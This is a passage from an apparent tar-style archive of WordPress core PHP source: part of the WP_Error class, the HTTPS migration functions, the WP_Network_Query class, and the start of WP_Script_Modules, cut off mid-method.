if ( empty( $code ) ) {
$code = $this->get_error_code();
}
if ( isset( $this->error_data[ $code ] ) ) {
return $this->error_data[ $code ];
}
}
/**
* Verifies if the instance contains errors.
*
* @since 5.1.0
*
* @return bool If the instance contains errors.
*/
public function has_errors() {
if ( ! empty( $this->errors ) ) {
return true;
}
return false;
}
/**
* Adds an error or appends an additional message to an existing error.
*
* @since 2.1.0
*
* @param string|int $code Error code.
* @param string $message Error message.
* @param mixed $data Optional. Error data. Default empty string.
*/
public function add( $code, $message, $data = '' ) {
$this->errors[ $code ][] = $message;
if ( ! empty( $data ) ) {
$this->add_data( $data, $code );
}
/**
* Fires when an error is added to a WP_Error object.
*
* @since 5.6.0
*
* @param string|int $code Error code.
* @param string $message Error message.
* @param mixed $data Error data. Might be empty.
* @param WP_Error $wp_error The WP_Error object.
*/
do_action( 'wp_error_added', $code, $message, $data, $this );
}
/**
* Adds data to an error with the given code.
*
* @since 2.1.0
* @since 5.6.0 Errors can now contain more than one item of error data. {@see WP_Error::$additional_data}.
*
* @param mixed $data Error data.
* @param string|int $code Error code.
*/
public function add_data( $data, $code = '' ) {
if ( empty( $code ) ) {
$code = $this->get_error_code();
}
if ( isset( $this->error_data[ $code ] ) ) {
$this->additional_data[ $code ][] = $this->error_data[ $code ];
}
$this->error_data[ $code ] = $data;
}
/**
* Retrieves all error data for an error code in the order in which the data was added.
*
* @since 5.6.0
*
* @param string|int $code Error code.
* @return mixed[] Array of error data, if it exists.
*/
public function get_all_error_data( $code = '' ) {
if ( empty( $code ) ) {
$code = $this->get_error_code();
}
$data = array();
if ( isset( $this->additional_data[ $code ] ) ) {
$data = $this->additional_data[ $code ];
}
if ( isset( $this->error_data[ $code ] ) ) {
$data[] = $this->error_data[ $code ];
}
return $data;
}
/**
* Removes the specified error.
*
* This function removes all error messages associated with the specified
* error code, along with any error data for that code.
*
* @since 4.1.0
*
* @param string|int $code Error code.
*/
public function remove( $code ) {
unset( $this->errors[ $code ] );
unset( $this->error_data[ $code ] );
unset( $this->additional_data[ $code ] );
}
/**
* Merges the errors in the given error object into this one.
*
* @since 5.6.0
*
* @param WP_Error $error Error object to merge.
*/
public function merge_from( WP_Error $error ) {
static::copy_errors( $error, $this );
}
/**
* Exports the errors in this object into the given one.
*
* @since 5.6.0
*
* @param WP_Error $error Error object to export into.
*/
public function export_to( WP_Error $error ) {
static::copy_errors( $this, $error );
}
/**
* Copies errors from one WP_Error instance to another.
*
* @since 5.6.0
*
* @param WP_Error $from The WP_Error to copy from.
* @param WP_Error $to The WP_Error to copy to.
*/
protected static function copy_errors( WP_Error $from, WP_Error $to ) {
foreach ( $from->get_error_codes() as $code ) {
foreach ( $from->get_error_messages( $code ) as $error_message ) {
$to->add( $code, $error_message );
}
foreach ( $from->get_all_error_data( $code ) as $data ) {
$to->add_data( $data, $code );
}
}
}
}
https-migration-20260607003229-20260621081100.php 0000666 00000011205 15224151220 0013341 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class-wp-network-query-20260621130233.php 0000666 00000046657 15224151220 0013234 0 ustar 00 <?php
/**
* Network API: WP_Network_Query class
*
* @package WordPress
* @subpackage Multisite
* @since 4.6.0
*/
/**
* Core class used for querying networks.
*
* @since 4.6.0
*
* @see WP_Network_Query::__construct() for accepted arguments.
*/
#[AllowDynamicProperties]
class WP_Network_Query {
/**
* SQL for database query.
*
* @since 4.6.0
* @var string
*/
public $request;
/**
* SQL query clauses.
*
* @since 4.6.0
* @var array
*/
protected $sql_clauses = array(
'select' => '',
'from' => '',
'where' => array(),
'groupby' => '',
'orderby' => '',
'limits' => '',
);
/**
* Query vars set by the user.
*
* @since 4.6.0
* @var array
*/
public $query_vars;
/**
* Default values for query vars.
*
* @since 4.6.0
* @var array
*/
public $query_var_defaults;
/**
* List of networks located by the query.
*
* @since 4.6.0
* @var array
*/
public $networks;
/**
* The amount of found networks for the current query.
*
* @since 4.6.0
* @var int
*/
public $found_networks = 0;
/**
* The number of pages.
*
* @since 4.6.0
* @var int
*/
public $max_num_pages = 0;
/**
* Constructor.
*
* Sets up the network query, based on the query vars passed.
*
* @since 4.6.0
*
* @param string|array $query {
* Optional. Array or query string of network query parameters. Default empty.
*
* @type int[] $network__in Array of network IDs to include. Default empty.
* @type int[] $network__not_in Array of network IDs to exclude. Default empty.
* @type bool $count Whether to return a network count (true) or array of network objects.
* Default false.
* @type string $fields Network fields to return. Accepts 'ids' (returns an array of network IDs)
* or empty (returns an array of complete network objects). Default empty.
* @type int $number Maximum number of networks to retrieve. Default empty (no limit).
* @type int $offset Number of networks to offset the query. Used to build LIMIT clause.
* Default 0.
* @type bool $no_found_rows Whether to disable the `SQL_CALC_FOUND_ROWS` query. Default true.
* @type string|array $orderby Network status or array of statuses. Accepts 'id', 'domain', 'path',
* 'domain_length', 'path_length' and 'network__in'. Also accepts false,
* an empty array, or 'none' to disable `ORDER BY` clause. Default 'id'.
* @type string $order How to order retrieved networks. Accepts 'ASC', 'DESC'. Default 'ASC'.
* @type string $domain Limit results to those affiliated with a given domain. Default empty.
* @type string[] $domain__in Array of domains to include affiliated networks for. Default empty.
* @type string[] $domain__not_in Array of domains to exclude affiliated networks for. Default empty.
* @type string $path Limit results to those affiliated with a given path. Default empty.
* @type string[] $path__in Array of paths to include affiliated networks for. Default empty.
* @type string[] $path__not_in Array of paths to exclude affiliated networks for. Default empty.
* @type string $search Search term(s) to retrieve matching networks for. Default empty.
* @type bool $update_network_cache Whether to prime the cache for found networks. Default true.
* }
*/
public function __construct( $query = '' ) {
$this->query_var_defaults = array(
'network__in' => '',
'network__not_in' => '',
'count' => false,
'fields' => '',
'number' => '',
'offset' => '',
'no_found_rows' => true,
'orderby' => 'id',
'order' => 'ASC',
'domain' => '',
'domain__in' => '',
'domain__not_in' => '',
'path' => '',
'path__in' => '',
'path__not_in' => '',
'search' => '',
'update_network_cache' => true,
);
if ( ! empty( $query ) ) {
$this->query( $query );
}
}
/**
* Parses arguments passed to the network query with default query parameters.
*
* @since 4.6.0
*
* @param string|array $query WP_Network_Query arguments. See WP_Network_Query::__construct() for accepted arguments.
*/
public function parse_query( $query = '' ) {
if ( empty( $query ) ) {
$query = $this->query_vars;
}
$this->query_vars = wp_parse_args( $query, $this->query_var_defaults );
/**
* Fires after the network query vars have been parsed.
*
* @since 4.6.0
*
* @param WP_Network_Query $query The WP_Network_Query instance (passed by reference).
*/
do_action_ref_array( 'parse_network_query', array( &$this ) );
}
/**
* Sets up the WordPress query for retrieving networks.
*
* @since 4.6.0
*
* @param string|array $query Array or URL query string of parameters.
* @return array|int List of WP_Network objects, a list of network IDs when 'fields' is set to 'ids',
* or the number of networks when 'count' is passed as a query var.
*/
public function query( $query ) {
$this->query_vars = wp_parse_args( $query );
return $this->get_networks();
}
/**
* Gets a list of networks matching the query vars.
*
* @since 4.6.0
*
* @return array|int List of WP_Network objects, a list of network IDs when 'fields' is set to 'ids',
* or the number of networks when 'count' is passed as a query var.
*/
public function get_networks() {
$this->parse_query();
/**
* Fires before networks are retrieved.
*
* @since 4.6.0
*
* @param WP_Network_Query $query Current instance of WP_Network_Query (passed by reference).
*/
do_action_ref_array( 'pre_get_networks', array( &$this ) );
$network_data = null;
/**
* Filters the network data before the query takes place.
*
* Return a non-null value to bypass WordPress' default network queries.
*
* The expected return type from this filter depends on the value passed
* in the request query vars:
* - When `$this->query_vars['count']` is set, the filter should return
* the network count as an integer.
* - When `'ids' === $this->query_vars['fields']`, the filter should return
* an array of network IDs.
* - Otherwise the filter should return an array of WP_Network objects.
*
* Note that if the filter returns an array of network data, it will be assigned
* to the `networks` property of the current WP_Network_Query instance.
*
* Filtering functions that require pagination information are encouraged to set
* the `found_networks` and `max_num_pages` properties of the WP_Network_Query object,
* passed to the filter by reference. If WP_Network_Query does not perform a database
* query, it will not have enough information to generate these values itself.
*
* @since 5.2.0
* @since 5.6.0 The returned array of network data is assigned to the `networks` property
* of the current WP_Network_Query instance.
*
* @param array|int|null $network_data Return an array of network data to short-circuit WP's network query,
* the network count as an integer if `$this->query_vars['count']` is set,
* or null to allow WP to run its normal queries.
* @param WP_Network_Query $query The WP_Network_Query instance, passed by reference.
*/
$network_data = apply_filters_ref_array( 'networks_pre_query', array( $network_data, &$this ) );
if ( null !== $network_data ) {
if ( is_array( $network_data ) && ! $this->query_vars['count'] ) {
$this->networks = $network_data;
}
return $network_data;
}
// $args can include anything. Only use the args defined in the query_var_defaults to compute the key.
$_args = wp_array_slice_assoc( $this->query_vars, array_keys( $this->query_var_defaults ) );
// Ignore the $fields, $update_network_cache arguments as the queried result will be the same regardless.
unset( $_args['fields'], $_args['update_network_cache'] );
$key = md5( serialize( $_args ) );
$last_changed = wp_cache_get_last_changed( 'networks' );
$cache_key = "get_network_ids:$key";
$cache_value = wp_cache_get_salted( $cache_key, 'network-queries', $last_changed );
if ( false === $cache_value ) {
$network_ids = $this->get_network_ids();
if ( $network_ids ) {
$this->set_found_networks();
}
$cache_value = array(
'network_ids' => $network_ids,
'found_networks' => $this->found_networks,
);
wp_cache_set_salted( $cache_key, $cache_value, 'network-queries', $last_changed );
} else {
$network_ids = $cache_value['network_ids'];
$this->found_networks = $cache_value['found_networks'];
}
if ( $this->found_networks && $this->query_vars['number'] ) {
$this->max_num_pages = (int) ceil( $this->found_networks / $this->query_vars['number'] );
}
// If querying for a count only, there's nothing more to do.
if ( $this->query_vars['count'] ) {
// $network_ids is actually a count in this case.
return (int) $network_ids;
}
$network_ids = array_map( 'intval', $network_ids );
if ( 'ids' === $this->query_vars['fields'] ) {
$this->networks = $network_ids;
return $this->networks;
}
if ( $this->query_vars['update_network_cache'] ) {
_prime_network_caches( $network_ids );
}
// Fetch full network objects from the primed cache.
$_networks = array();
foreach ( $network_ids as $network_id ) {
$_network = get_network( $network_id );
if ( $_network ) {
$_networks[] = $_network;
}
}
/**
* Filters the network query results.
*
* @since 4.6.0
*
* @param WP_Network[] $_networks An array of WP_Network objects.
* @param WP_Network_Query $query Current instance of WP_Network_Query (passed by reference).
*/
$_networks = apply_filters_ref_array( 'the_networks', array( $_networks, &$this ) );
// Convert to WP_Network instances.
$this->networks = array_map( 'get_network', $_networks );
return $this->networks;
}
/**
* Used internally to get a list of network IDs matching the query vars.
*
* @since 4.6.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @return int|array A single count of network IDs if a count query. An array of network IDs if a full query.
*/
protected function get_network_ids() {
global $wpdb;
$order = $this->parse_order( $this->query_vars['order'] );
// Disable ORDER BY with 'none', an empty array, or boolean false.
if ( in_array( $this->query_vars['orderby'], array( 'none', array(), false ), true ) ) {
$orderby = '';
} elseif ( ! empty( $this->query_vars['orderby'] ) ) {
$ordersby = is_array( $this->query_vars['orderby'] ) ?
$this->query_vars['orderby'] :
preg_split( '/[,\s]/', $this->query_vars['orderby'] );
$orderby_array = array();
foreach ( $ordersby as $_key => $_value ) {
if ( ! $_value ) {
continue;
}
if ( is_int( $_key ) ) {
$_orderby = $_value;
$_order = $order;
} else {
$_orderby = $_key;
$_order = $_value;
}
$parsed = $this->parse_orderby( $_orderby );
if ( ! $parsed ) {
continue;
}
if ( 'network__in' === $_orderby ) {
$orderby_array[] = $parsed;
continue;
}
$orderby_array[] = $parsed . ' ' . $this->parse_order( $_order );
}
$orderby = implode( ', ', $orderby_array );
} else {
$orderby = "$wpdb->site.id $order";
}
$number = absint( $this->query_vars['number'] );
$offset = absint( $this->query_vars['offset'] );
$limits = '';
if ( ! empty( $number ) ) {
if ( $offset ) {
$limits = 'LIMIT ' . $offset . ',' . $number;
} else {
$limits = 'LIMIT ' . $number;
}
}
if ( $this->query_vars['count'] ) {
$fields = 'COUNT(*)';
} else {
$fields = "$wpdb->site.id";
}
// Parse network IDs for an IN clause.
if ( ! empty( $this->query_vars['network__in'] ) ) {
$this->sql_clauses['where']['network__in'] = "$wpdb->site.id IN ( " . implode( ',', wp_parse_id_list( $this->query_vars['network__in'] ) ) . ' )';
}
// Parse network IDs for a NOT IN clause.
if ( ! empty( $this->query_vars['network__not_in'] ) ) {
$this->sql_clauses['where']['network__not_in'] = "$wpdb->site.id NOT IN ( " . implode( ',', wp_parse_id_list( $this->query_vars['network__not_in'] ) ) . ' )';
}
if ( ! empty( $this->query_vars['domain'] ) ) {
$this->sql_clauses['where']['domain'] = $wpdb->prepare( "$wpdb->site.domain = %s", $this->query_vars['domain'] );
}
// Parse network domain for an IN clause.
if ( is_array( $this->query_vars['domain__in'] ) ) {
$this->sql_clauses['where']['domain__in'] = "$wpdb->site.domain IN ( '" . implode( "', '", $wpdb->_escape( $this->query_vars['domain__in'] ) ) . "' )";
}
// Parse network domain for a NOT IN clause.
if ( is_array( $this->query_vars['domain__not_in'] ) ) {
$this->sql_clauses['where']['domain__not_in'] = "$wpdb->site.domain NOT IN ( '" . implode( "', '", $wpdb->_escape( $this->query_vars['domain__not_in'] ) ) . "' )";
}
if ( ! empty( $this->query_vars['path'] ) ) {
$this->sql_clauses['where']['path'] = $wpdb->prepare( "$wpdb->site.path = %s", $this->query_vars['path'] );
}
// Parse network path for an IN clause.
if ( is_array( $this->query_vars['path__in'] ) ) {
$this->sql_clauses['where']['path__in'] = "$wpdb->site.path IN ( '" . implode( "', '", $wpdb->_escape( $this->query_vars['path__in'] ) ) . "' )";
}
// Parse network path for a NOT IN clause.
if ( is_array( $this->query_vars['path__not_in'] ) ) {
$this->sql_clauses['where']['path__not_in'] = "$wpdb->site.path NOT IN ( '" . implode( "', '", $wpdb->_escape( $this->query_vars['path__not_in'] ) ) . "' )";
}
// Falsey search strings are ignored.
if ( strlen( $this->query_vars['search'] ) ) {
$this->sql_clauses['where']['search'] = $this->get_search_sql(
$this->query_vars['search'],
array( "$wpdb->site.domain", "$wpdb->site.path" )
);
}
$join = '';
$where = implode( ' AND ', $this->sql_clauses['where'] );
$groupby = '';
$pieces = array( 'fields', 'join', 'where', 'orderby', 'limits', 'groupby' );
/**
* Filters the network query clauses.
*
* @since 4.6.0
*
* @param string[] $clauses {
* Associative array of the clauses for the query.
*
* @type string $fields The SELECT clause of the query.
* @type string $join The JOIN clause of the query.
* @type string $where The WHERE clause of the query.
* @type string $orderby The ORDER BY clause of the query.
* @type string $limits The LIMIT clause of the query.
* @type string $groupby The GROUP BY clause of the query.
* }
* @param WP_Network_Query $query Current instance of WP_Network_Query (passed by reference).
*/
$clauses = apply_filters_ref_array( 'networks_clauses', array( compact( $pieces ), &$this ) );
$fields = isset( $clauses['fields'] ) ? $clauses['fields'] : '';
$join = isset( $clauses['join'] ) ? $clauses['join'] : '';
$where = isset( $clauses['where'] ) ? $clauses['where'] : '';
$orderby = isset( $clauses['orderby'] ) ? $clauses['orderby'] : '';
$limits = isset( $clauses['limits'] ) ? $clauses['limits'] : '';
$groupby = isset( $clauses['groupby'] ) ? $clauses['groupby'] : '';
if ( $where ) {
$where = 'WHERE ' . $where;
}
if ( $groupby ) {
$groupby = 'GROUP BY ' . $groupby;
}
if ( $orderby ) {
$orderby = "ORDER BY $orderby";
}
$found_rows = '';
if ( ! $this->query_vars['no_found_rows'] ) {
$found_rows = 'SQL_CALC_FOUND_ROWS';
}
$this->sql_clauses['select'] = "SELECT $found_rows $fields";
$this->sql_clauses['from'] = "FROM $wpdb->site $join";
$this->sql_clauses['groupby'] = $groupby;
$this->sql_clauses['orderby'] = $orderby;
$this->sql_clauses['limits'] = $limits;
// Beginning of the string is on a new line to prevent leading whitespace. See https://core.trac.wordpress.org/ticket/56841.
$this->request =
"{$this->sql_clauses['select']}
{$this->sql_clauses['from']}
{$where}
{$this->sql_clauses['groupby']}
{$this->sql_clauses['orderby']}
{$this->sql_clauses['limits']}";
if ( $this->query_vars['count'] ) {
return (int) $wpdb->get_var( $this->request );
}
$network_ids = $wpdb->get_col( $this->request );
return array_map( 'intval', $network_ids );
}
/**
* Populates found_networks and max_num_pages properties for the current query
* if the limit clause was used.
*
* @since 4.6.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*/
private function set_found_networks() {
global $wpdb;
if ( $this->query_vars['number'] && ! $this->query_vars['no_found_rows'] ) {
/**
* Filters the query used to retrieve found network count.
*
* @since 4.6.0
*
* @param string $found_networks_query SQL query. Default 'SELECT FOUND_ROWS()'.
* @param WP_Network_Query $network_query The `WP_Network_Query` instance.
*/
$found_networks_query = apply_filters( 'found_networks_query', 'SELECT FOUND_ROWS()', $this );
$this->found_networks = (int) $wpdb->get_var( $found_networks_query );
}
}
/**
* Used internally to generate an SQL string for searching across multiple columns.
*
* @since 4.6.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $search Search string.
* @param string[] $columns Array of columns to search.
* @return string Search SQL.
*/
protected function get_search_sql( $search, $columns ) {
global $wpdb;
$like = '%' . $wpdb->esc_like( $search ) . '%';
$searches = array();
foreach ( $columns as $column ) {
$searches[] = $wpdb->prepare( "$column LIKE %s", $like );
}
return '(' . implode( ' OR ', $searches ) . ')';
}
/**
* Parses and sanitizes 'orderby' keys passed to the network query.
*
* @since 4.6.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $orderby Alias for the field to order by.
* @return string|false Value to used in the ORDER clause. False otherwise.
*/
protected function parse_orderby( $orderby ) {
global $wpdb;
$allowed_keys = array(
'id',
'domain',
'path',
);
$parsed = false;
if ( 'network__in' === $orderby ) {
$network__in = implode( ',', array_map( 'absint', $this->query_vars['network__in'] ) );
$parsed = "FIELD( {$wpdb->site}.id, $network__in )";
} elseif ( 'domain_length' === $orderby || 'path_length' === $orderby ) {
$field = substr( $orderby, 0, -7 );
$parsed = "CHAR_LENGTH($wpdb->site.$field)";
} elseif ( in_array( $orderby, $allowed_keys, true ) ) {
$parsed = "$wpdb->site.$orderby";
}
return $parsed;
}
/**
* Parses an 'order' query variable and cast it to 'ASC' or 'DESC' as necessary.
*
* @since 4.6.0
*
* @param string $order The 'order' query variable.
* @return string The sanitized 'order' query variable.
*/
protected function parse_order( $order ) {
if ( ! is_string( $order ) || empty( $order ) ) {
return 'ASC';
}
if ( 'ASC' === strtoupper( $order ) ) {
return 'ASC';
} else {
return 'DESC';
}
}
}
class-wp-script-modules-20260605023816.php 0000666 00000100225 15224151220 0013342 0 ustar 00 <?php
/**
* Script Modules API: WP_Script_Modules class.
*
* Native support for ES Modules and Import Maps.
*
* @package WordPress
* @subpackage Script Modules
*/
/**
* Core class used to register script modules.
*
* @since 6.5.0
*/
class WP_Script_Modules {
/**
* Holds the registered script modules, keyed by script module identifier.
*
* @since 6.5.0
* @var array<string, array<string, mixed>>
*/
private $registered = array();
/**
* An array of IDs for queued script modules.
*
* @since 6.9.0
* @var string[]
*/
private $queue = array();
/**
* Holds the script module identifiers that have been printed.
*
* @since 6.9.0
* @var string[]
*/
private $done = array();
/**
* Tracks whether the @wordpress/a11y script module is available.
*
* Some additional HTML is required on the page for the module to work. Track
* whether it's available to print at the appropriate time.
*
* @since 6.7.0
* @var bool
*/
private $a11y_available = false;
/**
* Holds a mapping of dependents (as IDs) for a given script ID.
* Used to optimize recursive dependency tree checks.
*
* @since 6.9.0
* @var array<string, string[]>
*/
private $dependents_map = array();
/**
* Holds the valid values for fetchpriority.
*
* @since 6.9.0
* @var string[]
*/
private $priorities = array(
'low',
'auto',
'high',
);
/**
* List of IDs for script modules encountered which have missing dependencies.
*
* An ID is added to this list when it is discovered to have missing dependencies. At this time, a warning is
* emitted with {@see _doing_it_wrong()}. The ID is then added to this list, so that duplicate warnings don't occur.
*
* @since 6.9.1
* @var string[]
*/
private $modules_with_missing_dependencies = array();
/**
* Registers the script module if no script module with that script module
* identifier has already been registered.
*
* @since 6.5.0
* @since 6.9.0 Added the $args parameter.
*
* @param string $id The identifier of the script module. Should be unique. It will be used in the
* final import map.
* @param string $src Optional. Full URL of the script module, or path of the script module relative
* to the WordPress root directory. If it is provided and the script module has
* not been registered yet, it will be registered.
* @param array $deps {
* Optional. List of dependencies.
*
* @type string|array ...$0 {
* An array of script module identifiers of the dependencies of this script
* module. The dependencies can be strings or arrays. If they are arrays,
* they need an `id` key with the script module identifier, and can contain
* an `import` key with either `static` or `dynamic`. By default,
* dependencies that don't contain an `import` key are considered static.
*
* @type string $id The script module identifier.
* @type string $import Optional. Import type. May be either `static` or
* `dynamic`. Defaults to `static`.
* }
* }
* @param string|false|null $version Optional. String specifying the script module version number. Defaults to false.
* It is added to the URL as a query string for cache busting purposes. If $version
* is set to false, the version number is the currently installed WordPress version.
* If $version is set to null, no version is added.
* @param array $args {
* Optional. An array of additional args. Default empty array.
*
* @type bool $in_footer Whether to print the script module in the footer. Only relevant to block themes. Default 'false'. Optional.
* @type 'auto'|'low'|'high' $fetchpriority Fetch priority. Default 'auto'. Optional.
* }
*/
public function register( string $id, string $src, array $deps = array(), $version = false, array $args = array() ) {
if ( '' === $id ) {
_doing_it_wrong( __METHOD__, __( 'Non-empty string required for id.' ), '6.9.0' );
return;
}
if ( ! isset( $this->registered[ $id ] ) ) {
$dependencies = array();
foreach ( $deps as $dependency ) {
if ( is_array( $dependency ) ) {
if ( ! isset( $dependency['id'] ) || ! is_string( $dependency['id'] ) ) {
_doing_it_wrong( __METHOD__, __( 'Missing required id key in entry among dependencies array.' ), '6.5.0' );
continue;
}
$dependencies[] = array(
'id' => $dependency['id'],
'import' => isset( $dependency['import'] ) && 'dynamic' === $dependency['import'] ? 'dynamic' : 'static',
);
} elseif ( is_string( $dependency ) ) {
$dependencies[] = array(
'id' => $dependency,
'import' => 'static',
);
} else {
_doing_it_wrong( __METHOD__, __( 'Entries in dependencies array must be either strings or arrays with an id key.' ), '6.5.0' );
}
}
$in_footer = isset( $args['in_footer'] ) && (bool) $args['in_footer'];
$fetchpriority = 'auto';
if ( isset( $args['fetchpriority'] ) ) {
if ( $this->is_valid_fetchpriority( $args['fetchpriority'] ) ) {
$fetchpriority = $args['fetchpriority'];
} else {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $fetchpriority, 2: $id */
__( 'Invalid fetchpriority `%1$s` defined for `%2$s` during script registration.' ),
is_string( $args['fetchpriority'] ) ? $args['fetchpriority'] : gettype( $args['fetchpriority'] ),
$id
),
'6.9.0'
);
}
}
$this->registered[ $id ] = array(
'src' => $src,
'version' => $version,
'dependencies' => $dependencies,
'in_footer' => $in_footer,
'fetchpriority' => $fetchpriority,
);
}
}
/**
* Gets IDs for queued script modules.
*
* @since 6.9.0
*
* @return string[] Script module IDs.
*/
public function get_queue(): array {
return $this->queue;
}
/**
* Checks if the provided fetchpriority is valid.
*
* @since 6.9.0
*
* @param string|mixed $priority Fetch priority.
* @return bool Whether valid fetchpriority.
*/
private function is_valid_fetchpriority( $priority ): bool {
return in_array( $priority, $this->priorities, true );
}
/**
* Sets the fetch priority for a script module.
*
* @since 6.9.0
*
* @param string $id Script module identifier.
* @param 'auto'|'low'|'high' $priority Fetch priority for the script module.
* @return bool Whether setting the fetchpriority was successful.
*/
public function set_fetchpriority( string $id, string $priority ): bool {
if ( ! isset( $this->registered[ $id ] ) ) {
return false;
}
if ( '' === $priority ) {
$priority = 'auto';
}
if ( ! $this->is_valid_fetchpriority( $priority ) ) {
_doing_it_wrong(
__METHOD__,
/* translators: %s: Invalid fetchpriority. */
sprintf( __( 'Invalid fetchpriority: %s' ), $priority ),
'6.9.0'
);
return false;
}
$this->registered[ $id ]['fetchpriority'] = $priority;
return true;
}
/**
* Sets whether a script module should be printed in the footer.
*
* This is only relevant in block themes.
*
* @since 6.9.0
*
* @param string $id Script module identifier.
* @param bool $in_footer Whether to print in the footer.
* @return bool Whether setting the printing location was successful.
*/
public function set_in_footer( string $id, bool $in_footer ): bool {
if ( ! isset( $this->registered[ $id ] ) ) {
return false;
}
$this->registered[ $id ]['in_footer'] = $in_footer;
return true;
}
/**
* Marks the script module to be enqueued in the page.
*
* If a src is provided and the script module has not been registered yet, it
* will be registered.
*
* @since 6.5.0
* @since 6.9.0 Added the $args parameter.
*
* @param string $id The identifier of the script module. Should be unique. It will be used in the
* final import map.
* @param string $src Optional. Full URL of the script module, or path of the script module relative
* to the WordPress root directory. If it is provided and the script module has
* not been registered yet, it will be registered.
* @param array $deps {
* Optional. List of dependencies.
*
* @type string|array ...$0 {
* An array of script module identifiers of the dependencies of this script
* module. The dependencies can be strings or arrays. If they are arrays,
* they need an `id` key with the script module identifier, and can contain
* an `import` key with either `static` or `dynamic`. By default,
* dependencies that don't contain an `import` key are considered static.
*
* @type string $id The script module identifier.
* @type string $import Optional. Import type. May be either `static` or
* `dynamic`. Defaults to `static`.
* }
* }
* @param string|false|null $version Optional. String specifying the script module version number. Defaults to false.
* It is added to the URL as a query string for cache busting purposes. If $version
* is set to false, the version number is the currently installed WordPress version.
* If $version is set to null, no version is added.
* @param array $args {
* Optional. An array of additional args. Default empty array.
*
* @type bool $in_footer Whether to print the script module in the footer. Only relevant to block themes. Default 'false'. Optional.
* @type 'auto'|'low'|'high' $fetchpriority Fetch priority. Default 'auto'. Optional.
* }
*/
public function enqueue( string $id, string $src = '', array $deps = array(), $version = false, array $args = array() ) {
if ( '' === $id ) {
_doing_it_wrong( __METHOD__, __( 'Non-empty string required for id.' ), '6.9.0' );
return;
}
if ( ! in_array( $id, $this->queue, true ) ) {
$this->queue[] = $id;
}
if ( ! isset( $this->registered[ $id ] ) && $src ) {
$this->register( $id, $src, $deps, $version, $args );
}
}
/**
* Unmarks the script module so it will no longer be enqueued in the page.
*
* @since 6.5.0
*
* @param string $id The identifier of the script module.
*/
public function dequeue( string $id ) {
$this->queue = array_values( array_diff( $this->queue, array( $id ) ) );
}
/**
* Removes a registered script module.
*
* @since 6.5.0
*
* @param string $id The identifier of the script module.
*/
public function deregister( string $id ) {
$this->dequeue( $id );
unset( $this->registered[ $id ] );
}
/**
* Adds the hooks to print the import map, enqueued script modules and script
* module preloads.
*
* In classic themes, the script modules used by the blocks are not yet known
* when the `wp_head` actions is fired, so it needs to print everything in the
* footer.
*
* @since 6.5.0
*/
public function add_hooks() {
$is_block_theme = wp_is_block_theme();
$position = $is_block_theme ? 'wp_head' : 'wp_footer';
add_action( $position, array( $this, 'print_import_map' ) );
if ( $is_block_theme ) {
/*
